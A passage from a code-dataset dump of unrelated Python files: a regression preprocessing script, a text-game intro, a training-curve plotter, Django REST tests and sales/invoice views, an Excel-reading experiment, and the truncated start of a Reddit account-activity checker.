os.path.join(savepath, name+'.xlsx')\n writer = pd.ExcelWriter(save_path_name)\n data.to_excel(writer,'Sheet1')\n writer.save() \n\n \n\ndef two_data_split_label(X,test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index=[]\n test_num=int(X_num*test_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del train_index[randomIndex]\n #train,test的index是抽取的数据集X的序号\n train=X[train_index]\n test=X[test_index]\n return train,test \n \ndef two_data_split_unlabel(X, Y, test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index=[]\n test_num=int(X_num*test_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del train_index[randomIndex]\n #train,test的index是抽取的数据集X的序号\n train_X = X[train_index]\n train_Y = Y[train_index]\n test_X = X[test_index]\n test_Y = Y[test_index]\n return train_X, train_Y[:,0], test_X, test_Y[:,0]\n \ndef two_data_split_unlabel_fix(X, Y, test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n fix_len = int((1-test_size)*X_num)\n #train,test的index是抽取的数据集X的序号\n train_X = X[:fix_len,:]\n train_Y = Y[:fix_len]\n test_X = X[fix_len:,:]\n test_Y = Y[fix_len:]\n return train_X, train_Y[:,0], test_X, test_Y[:,0] \n \ndef three_data_split_unlabel(X, Y, cv_size=0.2, test_size=0.2):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index = []\n cv_index = []\n test_num = int(X_num*test_size)\n cv_num = int(X_num*cv_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del(train_index[randomIndex])\n for i in range(cv_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n cv_index.append(train_index[randomIndex])\n del(train_index[randomIndex])\n #train,test的index是抽取的数据集X的序号\n train_X = X[train_index] \n train_Y = Y[train_index]\n cv_X = X[cv_index]\n cv_Y = Y[cv_index]\n test_X = X[test_index]\n test_Y = Y[test_index]\n return train_X, train_Y[:,0], cv_X, cv_Y[:,0], test_X, test_Y[:,0]\n\n \nclass DataLinReg:\n def __init__(self):\n #日志保存\n log_savepath = r'.'\n log_filename = \"record_data_preprocess.log\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=os.path.join(log_savepath, log_filename),\n filemode='a')\n #################################################################################################\n #定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n #formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s') #levelname共占据8个字段\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n #################################################################################################\n \n self.data_directory = r'temp_data_v6_v3\\(0.02_100_0.2)\\mean_diff_0.2'\n self.train_x_name = '训练'\n self.train_y_name = 'Y'\n self.test_a_name = '测试A'\n self.test_b_name = '测试B'\n \n logging.info('read files from %s, the data_preprocess started !!!' % (self.data_directory))\n \n def data_read(self):\n #将所有数据读出,四组数据,前三组的列数完全相同\n self.raw_data = {} #保存原始xlsx全部信息\n for data_name in [self.train_x_name, self.train_y_name, self.test_a_name, self.test_b_name]:\n data_path = os.path.join(self.data_directory, data_name + '.xlsx')\n df = pd.read_excel(data_path)\n df.index = df[INDEX_ID].tolist() #将ID取消了\n del(df[INDEX_ID])\n df.index.name = INDEX_ID #将index名称获取\n self.raw_data[data_name] = df\n self.test_a_index = self.raw_data[self.test_a_name].index\n self.test_b_index = self.raw_data[self.test_b_name].index\n logging.info('data_read successfully !!!')\n #将dataframe转为numpy\n self.new_data = {} #保存全部预处理之后的数据\n for data_name in [self.train_x_name, self.train_y_name, self.test_a_name, self.test_b_name]:\n self.new_data[data_name] = np.array(self.raw_data[data_name])#保存所有数据进来\n #将train的数据进行分割,用于训练\n (self.train_X, self.train_Y, self.cv_X, self.cv_Y) = two_data_split_unlabel_fix(self.new_data['训练'], self.new_data['Y'], test_size=0.2)\n logging.info('labeled data seperated successfully !!!')\n \n def linear_analysis(self):\n #利用线性回归函数进行相关计算\n \n l_candidate = [0, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 30, 100, 300, 1000, 3000]\n training_cost, cv_cost = [], []\n for l in l_candidate:\n res = lr.linear_regression_np(self.train_X, self.train_Y, l)\n tc = lr.cost(res.x, self.train_X, self.train_Y)\n cv = lr.cost(res.x, self.cv_X, self.cv_Y)\n training_cost.append(tc)\n cv_cost.append(cv)\n sel_index = np.argmin(cv_cost) #其实可以直接将sel_index=0,因为目前\n #sel_index = 0 #其实可以直接将sel_index=0,因为目前\n set_l = l_candidate[sel_index]\n #绘图看效果\n plt.figure(figsize = (12.7, 7.8)) \n plt.plot(l_candidate, training_cost, label='training')\n plt.plot(l_candidate, cv_cost, label='cross validation')\n plt.xscale('log')\n plt.ylim([0,0.1])\n plt.legend(loc=2)\n #plt.yscale('log')\n plt.xlabel('lambda')\n plt.ylabel('cost')\n plt.suptitle('lambda: %f, train: %f, cv: %f'%(set_l, training_cost[sel_index], cv_cost[sel_index]), fontsize = 12, fontweight = 'bold')\n title_cost_l = 'lambda'\n plt.savefig(os.path.join(self.data_directory, title_cost_l))\n plt.close('all')\n \n logging.info('lambda figure saved successfully !!!')\n \n #m个样本进���训练查看,判断bias和variance\n training_cost, cv_cost = [], []\n m = self.train_X.shape[0]\n for i in range(1, m+1): #查看随着训练样本m的增大,cost的变化情况\n res = lr.linear_regression_np(self.train_X[:i, :], self.train_Y[:i], l=set_l)\n tc = lr.regularized_cost(res.x, self.train_X[:i, :], self.train_Y[:i], l=set_l)\n cv = lr.regularized_cost(res.x, self.cv_X, self.cv_Y, l=set_l)\n training_cost.append(tc)\n cv_cost.append(cv)\n #绘图看效果\n plt.figure(figsize = (12.7, 7.8)) \n plt.plot(np.arange(1, m+1), training_cost, label='training cost')\n plt.plot(np.arange(1, m+1), cv_cost, label='cv cost')\n plt.legend(loc=2)\n plt.yscale('log')\n plt.ylim([1e-8,1e2])\n plt.xlabel('sample_num')\n plt.ylabel('cost')\n plt.suptitle('cost vs sample_num', fontsize = 12, fontweight = 'bold')\n title_cost_l = 'sample_num'\n plt.savefig(os.path.join(self.data_directory, title_cost_l))\n plt.close('all')\n \n logging.info('sample_num figure saved successfully !!!')\n \n self.theta = lr.linear_regression_np(self.train_X, self.train_Y, set_l).x\n \n def results_get(self):\n #根据上述结果,计算A和B的数据结果\n test_a_Y = self.new_data['测试A'] @ self.theta\n test_b_Y = self.new_data['测试B'] @ self.theta\n test_a_dataframe = pd.DataFrame(test_a_Y, columns = ['Y'], index = self.test_a_index)\n test_b_dataframe = pd.DataFrame(test_b_Y, columns = ['Y'], index = self.test_b_index)\n dataframe_to_excel(test_a_dataframe, self.data_directory, '测试A_Y')\n dataframe_to_excel(test_b_dataframe, self.data_directory, '测试B_Y')\n logging.info('data saved successfully !!!')\n \ndef main():\n time_start = time.time()\n \n dlr = DataLinReg()\n dlr.data_read() #读“训练.xlsx”数据时间太长\n dlr.linear_analysis() #获得最优系数,以及train, cv, test的误差(图上直接绘图)\n dlr.results_get() #根据给出的最优系数,得到所需的预测A和B\n\n time_stop = time.time() \n logging.info('The data_preprocess is finished, all process time is %d s !!!' %(time_stop-time_start))\n \nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"TianChi_Quality-prediction-of-intelligent-manufacturing-master/data_linear_regression_v3.py","file_name":"data_linear_regression_v3.py","file_ext":"py","file_size_in_byte":9954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"423426045","text":"def showBackstory():\n\tfrom os import system as sysShell\n\tfrom time import sleep as wait\n\n\tvalidInput = False\n\twhile validInput is not True:\n\t\tshowBS = input(\"Play the backstory (recommended to new players)? (y/N) >\").lower()\n\t\tif showBS == \"n\":\n\t\t\tshowBS = False\n\t\t\tvalidInput = True\n\t\telif showBS == \"y\":\n\t\t\tshowBS = True\n\t\t\tvalidInput = True\n\t\telse:\n\t\t\tprint(\"Please use valid input (y or n).\")\n\tif showBS:\n\t\tsysShell(\"reset\")\n\t\tprint('BLACK ALERT. BLACK ALERT.')\n\t\twait(2)\n\t\tprint('\"...reactor is overloaded!\"')\n\t\twait(2)\n\t\tprint('\"...quantum containment field has failed, and the...\"')\n\t\twait(2)\n\t\tprint('BLACK ALERT. BLACK ALERT.')\n\t\twait(2)\n\t\tprint('\"...20 seconds from total breach...\"')\n\t\twait(1)\n\t\tprint('\"...somebody, you have to...\"')\n\t\twait(1)\n\t\tprint('\"...can\\'t hold it in...\"')\n\t\twait(0.5)\n\t\tprint('\"...supposed to lead us to utopia!\"')\n\t\twait(0.5)\n\t\tprint('\"...all doomed, we\\'re all doomed, we\\'re all doomed...\"')\n\t\twait(0.4)\n\t\tprint('\"...continuum destabilisation imminent...\"')\n\t\twait(0.3)\n\t\tprint('\"...all meant to be safe last June...\"')\n\t\twait(3)\n\t\tprint('')\n\t\tprint('')\n\t\tprint('BLACK ALERT.')\n\t\twait(0.75)\n\t\tprint('BLACK ALERT.')\n\t\twait(0.75)\n\t\tprint('BLACK ALERT.')\n\t\twait(7)\n\n\t\tsysShell(\"reset\")\n\t\tprint('Ugh.')\n\t\twait(4)\n\t\tprint('Your head hurts.')\n\t\twait(2)\n\t\tprint('You have no idea where you are.')\n\t\twait(2)\n\t\tprint('More importantly, you have no idea who you are.')\n\t\twait(2)\n\t\tprint('You know something happened, but you\\'re not sure what.')\n\t\twait(3)\n\t\tprint('Judging by your headache - and lack of memory - it probably wasn\\'t great.')\n\t\twait(3)\n\t\tprint('Apart from that, you are in fairly good shape. You are not hungry, and you are unhurt.')\n\t\twait(3)\n\t\tprint('You are wearing a t-shirt (is that what it\\'s called?) that reads \"NASA - Temporal Research Dept.\"')\n\t\twait(4)\n\t\tprint(\"Phew. At least you can still read. What that text means, however, is a mystery.\")\n\n\t\twait(7)\n\tsysShell(\"reset\")","sub_path":"game/backstory.py","file_name":"backstory.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506249158","text":"from parser import argparser\nimport torch\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nargs = argparser()\nargs = vars(args)\ntitle_dict = ('Train-ACC', 'Test-ACC')\ntitle_dict1 = ('Train-G_loss', 'Train-D_loss')\n\n\ndef plot_curve(x, data, title_dict, title='', ylabel='Accuracy'):\n figure, ax = plt.subplots()\n plots = ax.plot(x, data, label='')\n figure.set_size_inches(8, 4)\n ax.legend(plots, title_dict, loc='best',\n framealpha=0.25, prop={'size': 'small', 'family': 'monospace'})\n ax.set_title(title)\n ax.set_xlabel('Epoch')\n ax.set_ylabel(ylabel)\n ax.grid(True)\n figure.tight_layout()\n # plt.show()\n plt.savefig(f'{title}_curve.png')\n\n\nif os.path.isfile(args['resume']):\n checkpoint = torch.load(args['resume'])\n trian_acc_list = checkpoint['TrainAcc_list']\n test_acc_list = checkpoint['TestAcc_list']\n\n gloss_list = checkpoint['Gloss_list']\n dloss_list = checkpoint['Dloss_list']\n print(checkpoint['epoch'])\n print(checkpoint['best_acc'])\n\n trian_acc_list = np.array(trian_acc_list, dtype=np.float)\n trian_acc_list = trian_acc_list.reshape(1, -1)\n test_acc_list = np.array(test_acc_list, dtype=np.float)\n test_acc_list = test_acc_list.reshape(1, -1)\n\n gloss_list = np.array(gloss_list, dtype=np.float)\n gloss_list = gloss_list.reshape(1, -1)\n\n dloss_list = np.array(dloss_list, dtype=np.float)\n dloss_list = dloss_list.reshape(1, -1)\n\n x = np.arange(checkpoint['epoch'])\n print(trian_acc_list.shape)\n print(trian_acc_list.shape)\n y = np.concatenate((trian_acc_list, test_acc_list), 0)\n y = y.transpose(1, 0)\n y1 = np.concatenate((gloss_list, dloss_list))\n y1 = y1.transpose(1, 0)\n print(y.shape)\n plot_curve(x, y, title_dict, 'Accuracy')\n plot_curve(x, y1, title_dict1, 'Loss', 'Loss')\n","sub_path":"lab5_Conditional_GANs/plot_figure.py","file_name":"plot_figure.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"511031485","text":"from django.utils import timezone\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom oauth2_provider.backends import UserModel\nfrom oauth2_provider.models import Application, AccessToken\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom api.models import Location, Conference\nfrom api.serializers import LocationSerializer, ConferenceSerializer\nimport datetime\n\n\nclass AuthenticatedRestTest(TestCase):\n\n def _create_authorization_header(self, token=None):\n return \"Bearer {0}\".format(token or self.access_token.token)\n\n def setup_client(self):\n self.test_user = UserModel.objects.create_user(\"test_user\", \"test@user.com\", \"123456\")\n\n self.application = Application(\n name=\"Test Application\",\n redirect_uris=\"http://localhost\",\n user=self.test_user,\n client_type=Application.CLIENT_CONFIDENTIAL,\n authorization_grant_type=Application.GRANT_AUTHORIZATION_CODE,\n )\n self.application.save()\n\n self.tok = AccessToken.objects.create(\n user=self.test_user, token='1234567890',\n application=self.application, scope='read write',\n expires=timezone.now() + datetime.timedelta(days=1)\n )\n\n self.client = APIClient(enforce_csrf_checks=True)\n auth = self._create_authorization_header(self.tok)\n self.client.credentials(HTTP_AUTHORIZATION=auth)\n\n def create_location(self):\n location = Location(\n title=\"My Location\",\n description=\"my description\",\n address_1=\"1 The Street\",\n address_town=\"town\",\n zipcode=\"SL4 4RE\"\n )\n\n location.save()\n return location\n\n def create_conference(self):\n\n conference = Conference(\n title='My conference',\n description='conference description',\n organiser='Fred Smith',\n location=self.location,\n start_datetime=timezone.now(),\n end_datetime=timezone.now()\n )\n\n conference.save()\n return conference\n\n\nclass LocationTests(AuthenticatedRestTest):\n\n def setUp(self):\n self.setup_client()\n\n self.test_data = dict(\n title='My Location',\n description='my description',\n address_1='1 The Street',\n address_town='town',\n zipcode='SL4 4RE'\n )\n\n def test_get_locations(self):\n self.create_location()\n url = reverse('location-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['title'], 'My Location', 'Correct location title')\n\n def test_get_location(self):\n location = self.create_location()\n url = reverse('location-detail', args=[location.id])\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'My Location')\n\n def test_add_location_returns_id(self):\n response = self.client.post(reverse('location-list'), self.test_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED,\n 'API Response tells the client the object was created')\n self.assertIsNotNone(response.data['id'],\n 'Confirm that a new ID was returned for the created object')\n\n def test_add_location_stores_data_in_db(self):\n response = self.client.post(reverse('location-list'), self.test_data, format='json')\n location = Location.objects.get(pk=response.data['id'])\n\n self.assertEqual(location.title, response.data['title'],\n 'Confirm that the location was added to the database and has the title')\n\n def test_update_location_returns_response(self):\n location = self.create_location()\n data = LocationSerializer(location).data\n data.update({'title': 'Changed'})\n\n response = self.client.put(reverse('location-detail', args=[location.id]), data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'Changed', 'Correct location title')\n\n def test_update_location_updates_db(self):\n location = self.create_location()\n data = LocationSerializer(location).data\n data.update({'title': 'Changed'})\n self.client.put(reverse('location-detail', args=[location.id]), data, format='json')\n\n updated_location = Location.objects.get(pk=location.id)\n self.assertEqual(updated_location.title, 'Changed')\n\n def test_delete_location_returns_response(self):\n location = self.create_location()\n response = self.client.delete(reverse('location-detail', args=[location.id]))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_location_updates_db(self):\n location = self.create_location()\n self.client.delete(reverse('location-detail', args=[location.id]))\n locations = Location.objects.filter(pk=location.id)\n self.assertEqual(len(locations), 0, 'Confirm it\\'s not there')\n\n\nclass ConferenceTests(AuthenticatedRestTest):\n\n def setUp(self):\n self.setup_client()\n\n self.location = self.create_location()\n self.test_data = dict(\n title='My conference',\n description='conference description',\n organiser='Fred Smith',\n location=self.location.id,\n start_datetime=timezone.now(),\n end_datetime=timezone.now()\n )\n\n def test_get_conferences(self):\n self.create_conference()\n url = reverse('conference-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['title'], 'My conference', 'Correct conference title')\n\n def test_get_conference(self):\n conference = self.create_conference()\n url = reverse('conference-detail', args=[conference.id])\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'My conference')\n\n def test_add_conference_returns_id(self):\n response = self.client.post(reverse('conference-list'), self.test_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED,\n 'API Response tells the client the object was created')\n self.assertIsNotNone(response.data['id'],\n 'Confirm that a new ID was returned for the created object')\n\n def test_add_conference_stores_data_in_db(self):\n response = self.client.post(reverse('conference-list'), self.test_data, format='json')\n conference = Conference.objects.get(pk=response.data['id'])\n\n self.assertEqual(conference.title, response.data['title'],\n 'Confirm that the location was added to the database and has the title')\n\n def test_update_conference_returns_response(self):\n conference = self.create_conference()\n data = ConferenceSerializer(conference).data\n data.update({'title': 'Changed'})\n\n response = self.client.put(reverse('conference-detail', args=[conference.id]), data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'Changed', 'Correct conference title')\n\n def test_update_conference_updates_db(self):\n conference = self.create_conference()\n data = ConferenceSerializer(conference).data\n data.update({'title': 'Changed'})\n self.client.put(reverse('conference-detail', args=[conference.id]), data, format='json')\n\n updated_conference = Conference.objects.get(pk=conference.id)\n self.assertEqual(updated_conference.title, 'Changed')\n\n def test_delete_conference_returns_response(self):\n conference = self.create_conference()\n response = self.client.delete(reverse('conference-detail', args=[conference.id]))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_conference_updates_db(self):\n conference = self.create_conference()\n self.client.delete(reverse('conference-detail', args=[conference.id]))\n conferences = Conference.objects.filter(pk=conference.id)\n self.assertEqual(len(conferences), 0, 'Confirm it\\'s not there')\n","sub_path":"api/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"41223168","text":"import json\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db import transaction\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom core.erp.forms import SaleForm,ClientForm\nfrom core.erp.mixins import ValidatePermissionRequiredMixin\nfrom django.views.generic import CreateView, ListView, DeleteView, View\n\nfrom core.erp.models import Sale, Product, DetSale, company, Client, Mesa\n\nimport os\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\nfrom crum import get_current_user\n\n\nclass SaleListView(LoginRequiredMixin, ValidatePermissionRequiredMixin, ListView):\n model = Sale\n template_name = 'sale/list.html'\n permission_required = 'view_sale'\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'searchdata':\n data = []\n for i in Sale.objects.all().filter(user_creation_id=get_current_user()):\n data.append(i.toJSON())\n elif action == 'search_details_prod':\n data = []\n for i in DetSale.objects.filter(sale_id=request.POST['id']):\n data.append(i.toJSON())\n else:\n data['error'] = 'Ha ocurrido un error'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Listado de Ventas'\n context['list_url'] = reverse_lazy('erp:sale_list')\n context['entity'] = 'Ventas'\n return context\nclass SaleCreateView(LoginRequiredMixin, ValidatePermissionRequiredMixin, CreateView):\n model = Sale\n form_class = SaleForm\n template_name = 'sale/create.html'\n success_url = reverse_lazy('erp:dashboard')\n permission_required = 'add_sale'\n url_redirect = success_url\n\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'search_products':\n data = []\n #conv a lista con loads\n ids_exculde= json.loads(request.POST['ids'])\n term = request.POST['term'].strip()\n products = Product.objects.filter(stock__gt=0, user_creation_id=get_current_user())\n if len(term):\n products = products.filter(name__icontains=term)\n for i in products.exclude(id__in=ids_exculde)[0:10]:\n item = i.toJSON()\n item['value'] = i.name\n #item['text'] = i.name\n data.append(item)\n elif action == 'search_autocomplete':\n data = []\n #conv a lista con loads\n ids_exculde= json.loads(request.POST['ids'])\n \n term = request.POST['term'].strip()\n data.append({'id':term, 'text': term})\n products = Product.objects.filter(name__icontains=term, stock__gt=0, user_creation_id=get_current_user())\n #in que mande rangos \n for i in products.exclude(id__in=ids_exculde)[0:10]:\n item = i.toJSON()\n item['text'] = i.name\n data.append(item)\n elif action == 'add':\n with transaction.atomic():\n vents = json.loads(request.POST['vents'])\n sale = Sale()\n sale.date_joined = vents['date_joined']\n sale.cli_id = vents['cli']\n sale.tables_id = vents['tables']\n sale.subtotal = float(vents['subtotal'])\n sale.iva = float(vents['iva'])\n sale.total = float(vents['total'])\n sale.pagorecibio = float(vents['pagorecibio'])\n sale.pagocambio = float(vents['pagocambio'])\n sale.save()\n for i in vents['products']:\n det = DetSale()\n det.sale_id = sale.id\n det.prod_id = i['id']\n det.cant = int(i['cant'])\n det.price = float(i['pvp'])\n det.subtotal = float(i['subtotal'])\n det.save()\n #stock se disminuya de input cantidad\n det.prod.stock -= det.cant\n det.prod.save()\n data ={'id': sale.id}\n elif action == 'search_clients':\n data = []\n term = request.POST['term']\n clients = Client.objects.filter(Q(names__icontains=term) | Q(surnames__icontains=term) | Q(phone__icontains=term), user_creation_id=get_current_user())[0:10]\n for i in clients:\n item = i.toJSON()\n item['text'] = i.get_full_name()\n data.append(item)\n elif action == 'create_client':\n with transaction.atomic():\n frmClient = ClientForm(request.POST)\n data = frmClient.save()\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Creación de una Venta'\n context['entity'] = 'Ventas'\n context['list_url'] = self.success_url\n context['action'] = 'add'\n context['frmClient'] = ClientForm()\n return context\n\n\nclass SaleDeleteView(LoginRequiredMixin, ValidatePermissionRequiredMixin, DeleteView):\n model = Sale\n template_name = 'sale/delete.html'\n success_url = reverse_lazy('erp:sale_list')\n permission_required = 'delete_sale'\n url_redirect = success_url\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminación de una Venta'\n context['entity'] = 'Ventas'\n context['list_url'] = self.success_url\n return context\n\n\nclass SaleinvoicePdfView(View):\n\n def link_callback(self, uri, rel):\n \"\"\"\n Convert HTML URIs to absolute system paths so xhtml2pdf can access those\n resources\n \"\"\"\n # use short variable names\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /static/media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n # convert URIs to absolute system paths\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri # handle absolute uri (ie: http://some.tld/foo.png)\n\n # asegúrese de que el archivo exista\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n def get(self, request, *args, **kwargs):\n try:\n template = get_template('sale/invoice.html')\n context = {\n 'sale': Sale.objects.get(pk=self.kwargs['pk']),\n 'comp': company.objects.get(user_creation_id=get_current_user()),\n 'icon': '{}{}'.format(settings.STATIC_URL, 'img/logos.png')\n }\n\n html = template.render(context)\n response = HttpResponse(content_type='application/pdf')\n #linea para que se descargue el pdf\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\n pisaStatus = pisa.CreatePDF(\n html, dest=response,\n link_callback=self.link_callback\n )\n \n return response\n except:\n pass\n return HttpResponseRedirect(reverse_lazy('erp:sale_list'))\n\n","sub_path":"proyecto python/app/core/erp/views/sale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628100312","text":"from __future__ import division\nimport openpyxl\nimport xlrd\nimport datetime\nimport trollius\nfrom trollius import tasks\nfrom openpyxl.utils import coordinate_from_string, column_index_from_string\n\n\nclass __obj__(object):\n pass\nt1= datetime.datetime.now()\nfx = xlrd.open_workbook(\"/home/hcsadmin/q03/xls/a001.xlsx\")\ncols_2 = []\nfor k,v in fx.name_and_scope_map.items():\n col = __obj__()\n col.name = v.name\n col.address = v.formula_text\n col.cell_letter = v.formula_text.split('!')[1].split(':')[0].split('$')[1]\n col.index = column_index_from_string(col.cell_letter)\n cols_2.append(col)\ndata_sheet_2 = [x for x in fx.sheets() if x.name == \"data\"][0]\ndata =[]\ndef get_row():\n @trollius.coroutine\n def get_cell(x,y):\n cell = data_sheet_2.cell(x,y)\n if cell.data_type == 1:\n return cell.value\n if cell.data_type == 2:\n return cell.value\n if cell.data_type == 3:\n return datetime.datetime(*xlrd.xldate_as_tuple(cell.value, fx.datemode))\n\n ret = []\n @tasks.coroutine\n def create_row(row):\n for i in range(0,data_sheet_2.ncols):\n ret.append(get_cell(row,i))\n return ret\n @trollius.coroutine\n def fetch():\n for row in range(1, data_sheet_2.nrows):\n yield create_row(data_sheet_2.row(row))\n loop =trollius.get_event_loop()\n loop.run_until_complete(fetch())\n return fetch()\nt2 = datetime.datetime.now()\nn2= (t2 - t1).microseconds\nt1= datetime.datetime.now()\n# wb=openpyxl.load_workbook(\"/home/hcsadmin/q03/xls/a001.xlsx\")\n# cols_1 =[]\n# for x in wb.defined_names.definedName:\n#\n# if hasattr(x, \"name\") and x.value != 'data!#REF!':\n# item = __obj__()\n# item.address = x.value\n# item.name = x.name\n# item.col = column_index_from_string(x.value.split(\"!\")[1].split(\":\")[0].replace(\"$\", \"\")) - 1\n# cols_1.append(item)\n# data_sheet_1 = wb.get_sheet_by_name(\"data\")\n# t2 = datetime.datetime.now()\n# n1= (t2 - t1).microseconds\n# wb.close()\n# get_row_time_1 = datetime.datetime.now()\n# list(data_sheet_1.rows)\n# get_row_time_1 = (datetime.datetime.now()-get_row_time_1).microseconds\n#\n# get_row_time_2 = datetime.datetime.now()\n# list(get_row())\n# get_row_time_2 = (datetime.datetime.now()-get_row_time_2).microseconds\n\n\n\n","sub_path":"test_read_excel.py","file_name":"test_read_excel.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"140870492","text":"#!/usr/bin/python3\n\n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. See\n# http://www.wtfpl.net/ for more details.\n#\n# @author C0ldSn4p\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport json \nimport time\nimport os.path\n\n\n#####################\n### Inputs & Conf ###\n#####################\n\n# local configuration with secret key, see secret_key_empty\n# Will need history access\nfrom generatedSetup.configuration import conf\n\ntimestamp_cutoff = 1598918400 # timestamp cutoff for old account, here 2020-09-01\n\n# start position in the list (usefull to resume), if 0 will reset the output files\nstartPos = 0\nstopPos = 30000 #stop at this position (usefull to process in batch)\n\n# list of users to test, contains a list users with username in the form \"users = [...]\"\nfrom inputList import users\n# users = ['C0ldSn4p', 'Antitout'] #example\n\n# output file name, will overwrite\noutputPath = \"results\"\noutputActiveFile = \"active.txt\"\noutputOldFile = \"old.txt\"\noutputDeadFile = \"dead.txt\"\noutputBugFile = \"bug.txt\"\n\n\n\n########################\n### Helper Functions ###\n########################\n\ndef getLatestTimestamp(response_text):\n try:\n jsonData = json.loads(response_text)\n if 'data' not in jsonData:\n return -1\n data = jsonData['data']\n most_recent = data['children'][0]\n timestamp = most_recent['data']['created_utc']\n return timestamp\n except:\n return -2\n\n\ndef waitIfNeeded(response):\n try:\n headers = response.headers\n ratelimitRemaining = 